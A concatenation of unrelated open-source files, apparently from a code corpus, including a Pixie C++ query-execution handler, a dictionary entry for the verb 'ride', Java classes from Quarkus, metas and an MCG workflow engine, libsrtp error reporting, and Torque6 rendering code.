/* * Copyright 2018- The Pixie Authors. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. * * SPDX-License-Identifier: Apache-2.0 */ #include "src/vizier/services/agent/manager/exec.h" #include <memory> #include <string> #include <utility> #include <jwt/jwt.hpp> #include "src/common/base/base.h" #include "src/common/event/task.h" #include "src/common/perf/perf.h" #include "src/vizier/services/agent/manager/manager.h" namespace px { namespace vizier { namespace agent { using ::px::event::AsyncTask; class ExecuteQueryMessageHandler::ExecuteQueryTask : public AsyncTask { public: ExecuteQueryTask(ExecuteQueryMessageHandler* h, carnot::Carnot* carnot, std::unique_ptr<messages::VizierMessage> msg) : parent_(h), carnot_(carnot), msg_(std::move(msg)), req_(msg_->execute_query_request()), query_id_(ParseUUID(req_.query_id()).ConsumeValueOrDie()) {} sole::uuid query_id() { return query_id_; } void Work() override { LOG(INFO) << absl::Substitute("Executing query: id=$0", query_id_.str()); VLOG(1) << absl::Substitute("Query Plan: $0=$1", query_id_.str(), req_.plan().DebugString()); auto s = carnot_->ExecutePlan(req_.plan(), query_id_, req_.analyze()); if (!s.ok()) { if (s.code() == px::statuspb::Code::CANCELLED) { LOG(WARNING) << absl::Substitute("Cancelled query: $0", query_id_.str()); } else { LOG(ERROR) << absl::Substitute("Query $0 failed, reason: $1, plan: $2", query_id_.str(), s.ToString(), req_.plan().DebugString()); } } else { LOG(INFO) << absl::Substitute("Completed query: id=$0", query_id_.str()); } } void Done() override { parent_->HandleQueryExecutionComplete(query_id_); } private: ExecuteQueryMessageHandler* parent_; carnot::Carnot* carnot_; std::unique_ptr<messages::VizierMessage> msg_; const messages::ExecuteQueryRequest& req_; sole::uuid query_id_; }; ExecuteQueryMessageHandler::ExecuteQueryMessageHandler(px::event::Dispatcher* dispatcher, Info* agent_info, Manager::VizierNATSConnector* nats_conn, carnot::Carnot* carnot) : MessageHandler(dispatcher, agent_info, nats_conn), carnot_(carnot) {} Status ExecuteQueryMessageHandler::HandleMessage(std::unique_ptr<messages::VizierMessage> msg) { // Create a task and run it on the threadpool. auto task = std::make_unique<ExecuteQueryTask>(this, carnot_, std::move(msg)); auto query_id = task->query_id(); auto runnable = dispatcher()->CreateAsyncTask(std::move(task)); auto runnable_ptr = runnable.get(); LOG(INFO) << "Queries in flight: " << running_queries_.size(); running_queries_[query_id] = std::move(runnable); runnable_ptr->Run(); return Status::OK(); } void ExecuteQueryMessageHandler::HandleQueryExecutionComplete(sole::uuid query_id) { // Upon completion of the query, we makr the runnable task for deletion. auto node = running_queries_.extract(query_id); if (node.empty()) { LOG(ERROR) << "Attempting to delete non-existent query: " << query_id.str(); return; } dispatcher()->DeferredDelete(std::move(node.mapped())); } } // namespace agent } // namespace vizier } // namespace px
1,516
335
<filename>R/Ride_verb.json { "word": "Ride", "definitions": [ "Sit on and control the movement of (an animal, typically a horse)", "Travel on a horse or other animal.", "Sit on and control (a bicycle or motorcycle)", "Travel in or on (a vehicle) as a passenger.", "Travel in (a vehicle or lift)", "Go through or over (an area) on a horse, bicycle, etc.", "Compete in (a race) on a horse, bicycle, or motorcycle.", "(of a vehicle, animal, racetrack, etc.) be of a particular character for riding on or in.", "Transport (someone) in a vehicle.", "Transport (goods)", "Be carried or supported by (something moving with great momentum)", "Move so as to project or overlap.", "(of a vessel) sail or float.", "Be full of or dominated by.", "Yield to (a blow) so as to reduce its impact.", "Have sexual intercourse with.", "Annoy, pester, or tease." ], "parts-of-speech": "Verb" }
394
10,225
<reponame>CraigMcDonaldCodes/quarkus<filename>independent-projects/arc/tests/src/test/java/io/quarkus/arc/test/interceptors/defaultmethod/DefaultMethodBean.java package io.quarkus.arc.test.interceptors.defaultmethod; import javax.enterprise.context.ApplicationScoped; @ApplicationScoped @ABinding public class DefaultMethodBean implements DefaultMethodInterface { @NextBinding public String hello() { return "hello"; } @Override public String ping() { return "pong"; } }
181
1,144
<gh_stars>1000+ package de.metas.handlingunits.storage; /* * #%L * de.metas.handlingunits.base * %% * Copyright (C) 2015 metas GmbH * %% * This program is free software: you can redistribute it and/or modify * it under the terms of the GNU General Public License as * published by the Free Software Foundation, either version 2 of the * License, or (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public * License along with this program. If not, see * <http://www.gnu.org/licenses/gpl-2.0.html>. * #L% */ import java.math.BigDecimal; import org.compiere.model.I_C_UOM; import de.metas.product.ProductId; import de.metas.quantity.Quantity; /** * Generic Handling Unit Storage. * * Implementations of this interface can be at any level of a given HU (e.g. HU Level, HU Item level etc). * * @author tsa * */ public interface IGenericHUStorage { /** * * @return parent storage or null */ IGenericHUStorage getParentStorage(); /** * Add or removed given <code>qty</code> to storage. * * @param productId * @param qty the qty to add (or to remove, if negative) * @param uom qty's UOM */ void addQty(ProductId productId, BigDecimal qty, I_C_UOM uom); /** * @return storage qty for <code>product</code> in <code>uom</code> unit of measure */ BigDecimal getQty(ProductId productId, I_C_UOM uom); default Quantity getQuantity(ProductId productId, I_C_UOM uom) { return Quantity.of(getQty(productId, uom), uom); } /** * * @return true if storage is empty */ boolean isEmpty(); /** * * @param productId * @return true if storage is empty for given product */ boolean isEmpty(ProductId productId); /** * @return true if this is a virtual storage (i.e. a storage for a virtual HU, HU Item etc) */ boolean isVirtual(); }
694
18,396
<gh_stars>1000+ /* * err.c * * error status reporting functions * * <NAME> * Cisco Systems, Inc. */ /* * * Copyright(c) 2001-2017 Cisco Systems, Inc. * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * * Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * * Redistributions in binary form must reproduce the above * copyright notice, this list of conditions and the following * disclaimer in the documentation and/or other materials provided * with the distribution. * * Neither the name of the Cisco Systems, Inc. nor the names of its * contributors may be used to endorse or promote products derived * from this software without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS * FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE * COPYRIGHT HOLDERS OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, * INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES * (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED * OF THE POSSIBILITY OF SUCH DAMAGE. * */ #ifdef HAVE_CONFIG_H #include <config.h> #endif #include "err.h" #include "datatypes.h" #include <string.h> /* srtp_err_file is the FILE to which errors are reported */ static FILE *srtp_err_file = NULL; srtp_err_status_t srtp_err_reporting_init() { #ifdef ERR_REPORTING_STDOUT srtp_err_file = stdout; #elif defined(ERR_REPORTING_FILE) /* open file for error reporting */ srtp_err_file = fopen(ERR_REPORTING_FILE, "w"); if (srtp_err_file == NULL) { return srtp_err_status_init_fail; } #endif return srtp_err_status_ok; } static srtp_err_report_handler_func_t *srtp_err_report_handler = NULL; srtp_err_status_t srtp_install_err_report_handler( srtp_err_report_handler_func_t func) { srtp_err_report_handler = func; return srtp_err_status_ok; } void srtp_err_report(srtp_err_reporting_level_t level, const char *format, ...) { char msg[512]; va_list args; if (srtp_err_file != NULL) { va_start(args, format); vfprintf(srtp_err_file, format, args); va_end(args); } if (srtp_err_report_handler != NULL) { va_start(args, format); if (vsnprintf(msg, sizeof(msg), format, args) > 0) { /* strip trailing \n, callback should not have one */ size_t l = strlen(msg); if (l && msg[l - 1] == '\n') { msg[l - 1] = '\0'; } srtp_err_report_handler(level, msg); /* * NOTE, need to be carefull, there is a potential that * octet_string_set_to_zero() could * call srtp_err_report() in the future, leading to recursion */ octet_string_set_to_zero(msg, sizeof(msg)); } va_end(args); } }
1,346
323
/* * @Copyright (c) 2018 缪聪(<EMAIL>) * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.mcg.plugin.generate; import java.io.ByteArrayOutputStream; import java.io.File; import java.io.PrintStream; import java.util.HashMap; import java.util.LinkedHashMap; import java.util.LinkedList; import java.util.List; import java.util.Map; import java.util.UUID; import java.util.concurrent.Callable; import java.util.concurrent.CancellationException; import org.slf4j.Logger; import org.slf4j.LoggerFactory; import com.alibaba.fastjson.JSON; import com.mcg.common.Constants; import com.mcg.common.sysenum.LogOutTypeEnum; import com.mcg.common.sysenum.LogTypeEnum; import com.mcg.common.sysenum.MessageTypeEnum; import com.mcg.entity.flow.FlowBase; import com.mcg.entity.flow.end.FlowEnd; import com.mcg.entity.flow.loop.FlowLoop; import com.mcg.entity.flow.start.FlowStart; import com.mcg.entity.generate.ExecuteStruct; import com.mcg.entity.generate.Order; import com.mcg.entity.generate.RunResult; import com.mcg.entity.generate.RunStatus; import com.mcg.entity.message.FlowBody; import com.mcg.entity.message.Message; import com.mcg.entity.message.NotifyBody; import com.mcg.plugin.assist.ExceptionProcess; import com.mcg.plugin.build.McgDirector; import com.mcg.plugin.build.McgProduct; import com.mcg.plugin.websocket.MessagePlugin; import com.mcg.util.FlowInstancesUtils; import com.mcg.util.Tools; import com.mcg.util.ZipCompressor; public class FlowTask implements Callable<RunStatus> { private Logger logger = LoggerFactory.getLogger(FlowTask.class); private String mcgWebScoketCode; private String httpSessionId; private ExecuteStruct executeStruct; /* 是否是子流程 */ private Boolean subFlag; public FlowTask(){ } public FlowTask(String mcgWebScoketCode, String httpSessionId, ExecuteStruct executeStruct, Boolean subFlag) { this.mcgWebScoketCode = mcgWebScoketCode; this.httpSessionId = httpSessionId; this.executeStruct = executeStruct; this.subFlag = subFlag; } @Override public RunStatus call() throws Exception { try { McgDirector director = new McgDirector(); int orderNum = 1; if(executeStruct.getOrders() != null && executeStruct.getOrders().getOrder() != null && executeStruct.getOrders().getOrder().size() > 0) { for(int i=0; i<executeStruct.getOrders().getOrder().size(); i++) { if(executeStruct.getRunStatus().isInterrupt()) { break; } List<Order> orderLoopList = executeStruct.getOrders().getOrder().get(i); int loopIndex = 0; /* 循环的开关 */ boolean swicth = true; do { Order order = orderLoopList.get(loopIndex ++); Message message = MessagePlugin.getMessage(); message.getHeader().setMesType(MessageTypeEnum.FLOW); FlowBody flowBody = new FlowBody(); String flowInstanceId = Tools.genFlowInstanceId(httpSessionId, executeStruct.getFlowId()); flowBody.setFlowInstanceId(flowInstanceId); flowBody.setFlowId(executeStruct.getFlowId()); flowBody.setSubFlag(executeStruct.getSubFlag()); McgProduct mcgProduct = executeStruct.getDataMap().get(order.getElementId()); executeStruct.setOrderNum(orderNum); McgProduct mcgProductClone = (McgProduct)mcgProduct.clone(); RunResult result = director.getFlowMcgProduct(mcgProductClone).build(executeStruct); FlowBase flowBase = (FlowBase)mcgProductClone; flowBody.setLogOutType(LogOutTypeEnum.RESULT.getValue()); flowBody.setEleType(flowBase.getEletypeEnum().getValue()); flowBody.setEleTypeDesc(flowBase.getEletypeEnum().getName()); flowBody.setEleId(order.getElementId()); flowBody.setComment(LogOutTypeEnum.RESULT.getName()); if(mcgProduct instanceof FlowStart || mcgProduct instanceof FlowEnd) { flowBody.setOrderNum(orderNum); } if(mcgProduct instanceof FlowLoop) { swicth = executeStruct.getRunStatus().getLoopStatusMap().get(order.getElementId()).getSwicth(); } executeStruct.getRunResultMap().put(order.getElementId(), result); if(result == null) { flowBody.setContent(""); } else if(result.getSourceCode() != null && !"".equals(result.getSourceCode())) { flowBody.setContent(result.getSourceCode()); } else if(result.getJsonVar() != null && !"".equals(result.getJsonVar())) { flowBody.setContent(result.getJsonVar()); } else if(result.getJsonVar() == null && result.getSourceCode() == null) { flowBody.setContent(""); } else { flowBody.setContent("控件运行值异常"); } flowBody.setLogOutType(LogOutTypeEnum.RESULT.getValue()); flowBody.setLogType(LogTypeEnum.INFO.getValue()); flowBody.setLogTypeDesc(LogTypeEnum.INFO.getName()); message.setBody(flowBody); MessagePlugin.push(mcgWebScoketCode, httpSessionId, message); if(!"success".equals(executeStruct.getRunStatus().getCode()) ) { break; } // 当有流程实例中存在循环时,重置下标进行达到无限循环 if(orderLoopList.size() == loopIndex) { loopIndex = 0; } orderNum ++; } while (!executeStruct.getRunStatus().isInterrupt() && orderLoopList.size() > 1 && swicth); } Message messageComplete = MessagePlugin.getMessage(); messageComplete.getHeader().setMesType(MessageTypeEnum.NOTIFY); NotifyBody notifyBody = new NotifyBody(); if(executeStruct.getRunStatus().isInterrupt()) { notifyBody.setContent("【" + executeStruct.getTopology().getName() + "】流程中断完毕!"); } else { notifyBody.setContent("【" + executeStruct.getTopology().getName() + "】流程执行完毕!"); } notifyBody.setType(LogTypeEnum.SUCCESS.getValue()); messageComplete.setBody(notifyBody); MessagePlugin.push(mcgWebScoketCode, httpSessionId, messageComplete); RunStatus runStatus = executeStruct.getRunStatus(); //流程实例执行时有产生文件 if(!executeStruct.getRunStatus().isInterrupt()) { Message fileMessage = MessagePlugin.getMessage(); fileMessage.getHeader().setMesType(MessageTypeEnum.FLOW); FlowBody fileFlowBody = new FlowBody(); if(subFlag) { fileFlowBody.setEleType("subFinish"); } else { fileFlowBody.setEleType("finish"); } fileFlowBody.setEleTypeDesc(executeStruct.getTopology().getName()); String tempId = UUID.randomUUID().toString(); fileFlowBody.setEleId(tempId); fileFlowBody.setSubFlag(executeStruct.getSubFlag()); fileFlowBody.setComment("流程执行完毕"); runStatus.setExecuteId(tempId); if(runStatus.getAvailableFileMap().size() > 0) { Map<String, LinkedHashMap<String, String>> availableFileMap = new HashMap<>(); LinkedHashMap<String, String> genFilesMap = new LinkedHashMap<String, String>(); List<String> filePathList = new LinkedList<String>(); for(String key : runStatus.getAvailableFileMap().keySet()) { filePathList.add(runStatus.getAvailableFileMap().get(key)); } String zipPath = Constants.DATA_PATH + "/../file/" + System.currentTimeMillis(); String zipName = "全部生成文件.zip"; genFilesMap.put(executeStruct.getFlowId(), zipPath + File.separator + zipName); ZipCompressor zipCompressor = new ZipCompressor(zipPath, zipName); zipCompressor.compress(filePathList); genFilesMap.putAll(runStatus.getAvailableFileMap()); availableFileMap.put("availableFileMap", genFilesMap); fileFlowBody.setContent(JSON.toJSONString(availableFileMap)); } else { fileFlowBody.setContent("none"); } fileFlowBody.setLogType(LogTypeEnum.INFO.getValue()); fileFlowBody.setLogTypeDesc(LogTypeEnum.INFO.getName()); fileMessage.setBody(fileFlowBody); MessagePlugin.push(mcgWebScoketCode, httpSessionId, fileMessage); } else { Message fileMessage = MessagePlugin.getMessage(); fileMessage.getHeader().setMesType(MessageTypeEnum.FLOW); FlowBody fileFlowBody = new FlowBody(); fileFlowBody.setEleType("interrupt"); fileFlowBody.setEleTypeDesc(executeStruct.getTopology().getName()); String tempId = UUID.randomUUID().toString(); fileFlowBody.setEleId(tempId); fileFlowBody.setComment("流程中断完毕"); runStatus.setExecuteId(tempId); fileFlowBody.setContent("执行引擎收到中断信号,流程已停止执行!"); fileFlowBody.setLogType(LogTypeEnum.INFO.getValue()); fileFlowBody.setLogTypeDesc(LogTypeEnum.INFO.getName()); fileMessage.setBody(fileFlowBody); MessagePlugin.push(mcgWebScoketCode, httpSessionId, fileMessage); } String flowInstanceId = Tools.genFlowInstanceId(httpSessionId, executeStruct.getFlowId()); FlowInstancesUtils.executeStructMap.remove(flowInstanceId); } } catch (InterruptedException e) { executeStruct.getRunStatus().setInterrupt(true); logger.error("流程中断,抛出InterruptedException,异常信息:", e); } catch(CancellationException e) { executeStruct.getRunStatus().setInterrupt(true); logger.error("流程中断,抛出CancellationException,异常信息:", e); } catch (Exception e) { ByteArrayOutputStream baos = new ByteArrayOutputStream(); e.printStackTrace(new PrintStream(baos)); String exception = baos.toString(); logger.error("流程执行发生错误,异常信息:", e); ExceptionProcess.execute(mcgWebScoketCode, httpSessionId, executeStruct.getFlowId(), executeStruct.getDataMap().get(executeStruct.getRunStatus().getExecuteId()), exception); } return executeStruct.getRunStatus(); } public String getHttpSessionId() { return httpSessionId; } public ExecuteStruct getExecuteStruct() { return executeStruct; } public void setExecuteStruct(ExecuteStruct executeStruct) { this.executeStruct = executeStruct; } public Boolean getSubFlag() { return subFlag; } public void setSubFlag(Boolean subFlag) { this.subFlag = subFlag; } }
6,021
312
<reponame>RichardRanft/Torque6<filename>src/rendering/rendering.cc //----------------------------------------------------------------------------- // Copyright (c) 2015 <NAME> // // Permission is hereby granted, free of charge, to any person obtaining a copy // of this software and associated documentation files (the "Software"), to // deal in the Software without restriction, including without limitation the // rights to use, copy, modify, merge, publish, distribute, sublicense, and/or // sell copies of the Software, and to permit persons to whom the Software is // furnished to do so, subject to the following conditions: // // The above copyright notice and this permission notice shall be included in // all copies or substantial portions of the Software. // // THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR // IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, // FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE // AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER // LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING // FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS // IN THE SOFTWARE. //----------------------------------------------------------------------------- #include "rendering.h" #include "console/consoleInternal.h" #include "graphics/dgl.h" #include "graphics/shaders.h" #include "graphics/core.h" #include "scene/scene.h" #include "rendering/transparency.h" #include "renderCamera.h" #include <bgfx/bgfx.h> #include <bx/fpumath.h> #include <bx/timer.h> namespace Rendering { // Canvas (TODO: remove/refactor this) bool windowSizeChanged = false; U32 windowWidth = 0; U32 windowHeight = 0; // Render Data RenderData* renderDataList = NULL; U32 renderDataCount = 0; // Render Cameras, Textures, and Hooks. Vector<RenderCamera*> renderCameraList; Vector<RenderTexture*> renderTextureList; Vector<RenderHook*> renderHookList; void init() { renderDataList = new RenderData[TORQUE_MAX_RENDER_DATA]; } void destroy() { for (S32 n = 0; n < renderTextureList.size(); ++n) { RenderTexture* rt = renderTextureList[n]; if (bgfx::isValid(rt->handle)) bgfx::destroyTexture((rt->handle)); } } void updateWindow(U32 width, U32 height) { windowSizeChanged = (windowWidth != width || windowHeight != height ); windowWidth = width; windowHeight = height; if (windowSizeChanged) { Graphics::reset(); resize(); Scene::refresh(); } } S32 QSORT_CALLBACK compareRenderCameraPriority(const void* a, const void* b) { RenderCamera* cameraA = *((RenderCamera**)a); RenderCamera* cameraB = *((RenderCamera**)b); return cameraA->getRenderPriority() > cameraB->getRenderPriority(); } // Process Frame void render() { // Reset the view table. This clears bgfx view settings and temporary views. Graphics::resetViews(); // We don't continue with rendering until preprocessing is complete (for now) if (Scene::isPreprocessingActive(true)) return; // Render Hooks also get notified about begin/end of frame. for (S32 n = 0; n < renderHookList.size(); ++n) renderHookList[n]->beginFrame(); // Sort Cameras dQsort(renderCameraList.address(), renderCameraList.size(), sizeof(RenderCamera*), compareRenderCameraPriority); // Render each camera. for (S32 i = 0; i < renderCameraList.size(); ++i) { RenderCamera* camera = renderCameraList[i]; camera->render(); } // End of frame for (S32 n = 0; n < renderHookList.size(); ++n) renderHookList[n]->endFrame(); } void resize() { } // ---------------------------------------- // Render Data // ---------------------------------------- RenderData* createRenderData() { RenderData* item = NULL; for ( U32 n = 0; n < renderDataCount; ++n ) { if ( renderDataList[n].flags & RenderData::Deleted ) { item = &renderDataList[n]; break; } } if ( item == NULL ) { item = &renderDataList[renderDataCount]; renderDataCount++; } // Reset Values item->flags = 0; item->instances = NULL; item->dynamicIndexBuffer.idx = bgfx::invalidHandle; item->dynamicVertexBuffer.idx = bgfx::invalidHandle; item->indexBuffer.idx = bgfx::invalidHandle; item->vertexBuffer.idx = bgfx::invalidHandle; item->shader.idx = bgfx::invalidHandle; item->material = NULL; item->transformCount = 0; item->transformTable = NULL; item->textures = NULL; item->stateRGBA = 0; item->state = 0 | BGFX_STATE_RGB_WRITE | BGFX_STATE_ALPHA_WRITE | BGFX_STATE_DEPTH_TEST_LESS | BGFX_STATE_DEPTH_WRITE | BGFX_STATE_CULL_CW; return item; } RenderData* getRenderDataList() { return renderDataList; } U32 getRenderDataCount() { return renderDataCount; } // ---------------------------------------- // Utility Functions // ---------------------------------------- Point2I worldToScreen(Point3F worldPos) { RenderCamera* activeCamera = getPriorityRenderCamera(); F32 viewProjMatrix[16]; bx::mtxMul(viewProjMatrix, activeCamera->viewMatrix, activeCamera->projectionMatrix); F32 projectedOutput[3]; F32 projectedInput[3] = {worldPos.x, worldPos.y, worldPos.z}; bx::vec3MulMtxH(projectedOutput, projectedInput, viewProjMatrix); projectedOutput[0] = ((projectedOutput[0] + 1.0f) / 2.0f) * activeCamera->width; projectedOutput[1] = ((1.0f - projectedOutput[1]) / 2.0f) * activeCamera->height; return Point2I((S32)projectedOutput[0], (S32)projectedOutput[1]); } void screenToWorld(Point2I screenPos, Point3F& nearPoint, Point3F& farPoint) { RenderCamera* activeCamera = getPriorityRenderCamera(); F32 invProjMtx[16]; bx::mtxInverse(invProjMtx, activeCamera->projectionMatrix); F32 invViewMtx[16]; bx::mtxInverse(invViewMtx, activeCamera->viewMatrix); F32 x = (2.0f * screenPos.x / Rendering::windowWidth - 1.0f) * -1.0f; F32 y = 2.0f * screenPos.y / Rendering::windowHeight - 1.0f; F32 z = -1.0f; // Near Coord Point4F clipCoordNear(x, y, z, 1.0); Point4F eyeCoordNear; bx::vec4MulMtx(eyeCoordNear, clipCoordNear, invProjMtx); Point4F worldCoordNear; bx::vec4MulMtx(worldCoordNear, eyeCoordNear, invViewMtx); nearPoint.x = worldCoordNear.x / worldCoordNear.w; nearPoint.y = worldCoordNear.y / worldCoordNear.w; nearPoint.z = worldCoordNear.z / worldCoordNear.w; // Far Coord Point4F clipCoordFar(x, y, z, -1.0); Point4F eyeCoordFar; bx::vec4MulMtx(eyeCoordFar, clipCoordFar, invProjMtx); Point4F worldCoordFar; bx::vec4MulMtx(worldCoordFar, eyeCoordFar, invViewMtx); farPoint.x = worldCoordFar.x / worldCoordFar.w; farPoint.y = worldCoordFar.y / worldCoordFar.w; farPoint.z = worldCoordFar.z / worldCoordFar.w; } bool closestPointsOnTwoLines(Point3F& closestPointLine1, Point3F& closestPointLine2, Point3F linePoint1, Point3F lineVec1, Point3F linePoint2, Point3F lineVec2) { closestPointLine1 = Point3F::Zero; closestPointLine2 = Point3F::Zero; float a = mDot(lineVec1, lineVec1); float b = mDot(lineVec1, lineVec2); float e = mDot(lineVec2, lineVec2); float d = a*e - b*b; //lines are not parallel if (d != 0.0f) { Point3F r = linePoint1 - linePoint2; float c = mDot(lineVec1, r); float f = mDot(lineVec2, r); float s = (b*f - c*e) / d; float t = (a*f - c*b) / d; closestPointLine1 = linePoint1 + lineVec1 * s; closestPointLine2 = linePoint2 + lineVec2 * t; return true; } else { return false; } } // ---------------------------------------- // Render Camera // ---------------------------------------- RenderCamera* createRenderCamera(StringTableEntry name, StringTableEntry renderingPath) { RenderCamera* camera = getRenderCamera(name); if (camera != NULL) { camera->refCount++; return camera; } camera = new RenderCamera(renderingPath); camera->setName(name); camera->refCount++; camera->registerObject(); renderCameraList.push_back(camera); return camera; } RenderCamera* getRenderCamera(StringTableEntry name) { for (Vector< RenderCamera* >::iterator itr = renderCameraList.begin(); itr != renderCameraList.end(); ++itr) { if ((*itr)->getName() == name) { return (*itr); } } return NULL; } // Return highest priorty render camera. RenderCamera* getPriorityRenderCamera() { if (renderCameraList.size() < 1) return NULL; dQsort(renderCameraList.address(), renderCameraList.size(), sizeof(RenderCamera*), compareRenderCameraPriority); return renderCameraList[renderCameraList.size() - 1]; } bool destroyRenderCamera(RenderCamera* camera) { for (Vector< RenderCamera* >::iterator itr = renderCameraList.begin(); itr != renderCameraList.end(); ++itr) { if ((*itr) == camera) { camera->refCount--; if (camera->refCount < 1) { renderCameraList.erase(itr); camera->deleteObject(); } return true; } } return false; } bool destroyRenderCamera(StringTableEntry name) { for (Vector< RenderCamera* >::iterator itr = renderCameraList.begin(); itr != renderCameraList.end(); ++itr) { if ((*itr)->getName() == name) { Rendering::RenderCamera* camera = (*itr); camera->refCount--; if (camera->refCount < 1) { renderCameraList.erase(itr); camera->deleteObject(); } return true; } } return false; } // ---------------------------------------- // Render Hooks // ---------------------------------------- void addRenderHook(RenderHook* hook) { renderHookList.push_back(hook); } bool removeRenderHook(RenderHook* hook) { for (Vector< RenderHook* >::iterator itr = renderHookList.begin(); itr != renderHookList.end(); ++itr) { if ((*itr) == hook) { renderHookList.erase(itr); return true; } } return false; } Vector<RenderHook*>* getRenderHookList() { return &renderHookList; } // ---------------------------------------- // Render Textures // ---------------------------------------- RenderTexture* createRenderTexture(StringTableEntry name, bgfx::BackbufferRatio::Enum ratio) { RenderTexture* rt = getRenderTexture(name); if (rt != NULL) return rt; const U32 flags = 0 | BGFX_TEXTURE_RT | BGFX_TEXTURE_MIN_POINT | BGFX_TEXTURE_MAG_POINT | BGFX_TEXTURE_MIP_POINT | BGFX_TEXTURE_U_CLAMP | BGFX_TEXTURE_V_CLAMP; rt = new RenderTexture(); rt->name = name; rt->handle = bgfx::createTexture2D(ratio, 1, bgfx::TextureFormat::BGRA8, flags); rt->width = Rendering::windowWidth; rt->height = Rendering::windowHeight; renderTextureList.push_back(rt); return rt; } RenderTexture* createRenderTexture(StringTableEntry name, U32 width, U32 height) { RenderTexture* rt = getRenderTexture(name); if (rt != NULL) return rt; const U32 flags = 0 | BGFX_TEXTURE_RT | BGFX_TEXTURE_MIN_POINT | BGFX_TEXTURE_MAG_POINT | BGFX_TEXTURE_MIP_POINT | BGFX_TEXTURE_U_CLAMP | BGFX_TEXTURE_V_CLAMP; rt = new RenderTexture(); rt->name = name; rt->handle = bgfx::createTexture2D(width, height, 1, bgfx::TextureFormat::BGRA8, flags); rt->width = width; rt->height = height; renderTextureList.push_back(rt); return rt; } RenderTexture* getRenderTexture(StringTableEntry name) { for (Vector< RenderTexture* >::iterator itr = renderTextureList.begin(); itr != renderTextureList.end(); ++itr) { if ((*itr)->name == name) { return (*itr); } } return NULL; } bool destroyRenderTexture(StringTableEntry name) { for (Vector< RenderTexture* >::iterator itr = renderTextureList.begin(); itr != renderTextureList.end(); ++itr) { if ((*itr)->name == name) { Rendering::RenderTexture* rt = (*itr); renderTextureList.erase(itr); SAFE_DELETE(rt); return true; } } return false; } // ---------------------------------------- // Uniforms // ---------------------------------------- UniformData::UniformData() { uniform.idx = bgfx::invalidHandle; count = 0; _dataPtr = NULL; } UniformData::UniformData(bgfx::UniformHandle _uniform, U32 _count) { uniform = _uniform; count = _count; _dataPtr = NULL; } UniformData::~UniformData() { // } void UniformData::setValue(F32 value) { _vecValues.set(value, 0.0f, 0.0f, 0.0f); _dataPtr = &_vecValues.x; } void UniformData::setValue(F32* value) { dMemcpy(_matValues, value, sizeof(_matValues)); _dataPtr = &_matValues[0]; } void UniformData::setValue(Point2F value) { _vecValues.set(value.x, value.y, 0.0f, 0.0f); _dataPtr = &_vecValues.x; } void UniformData::setValue(Point3F value) { _vecValues.set(value.x, value.y, value.z, 0.0f); _dataPtr = &_vecValues.x; } void UniformData::setValue(Point4F value) { _vecValues.set(value.x, value.y, value.z, value.w); _dataPtr = &_vecValues.x; } UniformSet::UniformSet() { _selfMade = false; uniforms = NULL; } UniformSet::~UniformSet() { if (_selfMade) { SAFE_DELETE(uniforms); } } void UniformSet::create() { uniforms = new Vector<UniformData>; _selfMade = true; } void UniformSet::clear() { if (!uniforms) return; uniforms->clear(); } bool UniformSet::isEmpty() { if (!uniforms) return true; return uniforms->size() < 1; } UniformData* UniformSet::addUniform() { if (!uniforms) create(); uniforms->push_back(Rendering::UniformData()); return &uniforms->back(); } UniformData* UniformSet::addUniform(const UniformData& uniform) { if (!uniforms) create(); for (S32 i = 0; i < uniforms->size(); i++) { Rendering::UniformData* uni = &uniforms->at(i); if (uni->uniform.idx == uniform.uniform.idx) { uni->_vecValues.set(uniform._vecValues.x, uniform._vecValues.y, uniform._vecValues.z, uniform._vecValues.w); dMemcpy(uni->_matValues, uniform._matValues, sizeof(uni->_matValues)); return uni; } } uniforms->push_back(uniform); return &uniforms->back(); } void UniformSet::addUniformSet(const UniformSet& uniformSet) { for (S32 n = 0; n < uniformSet.uniforms->size(); n++) addUniform(uniformSet.uniforms->at(n)); } }
6,905
1,119
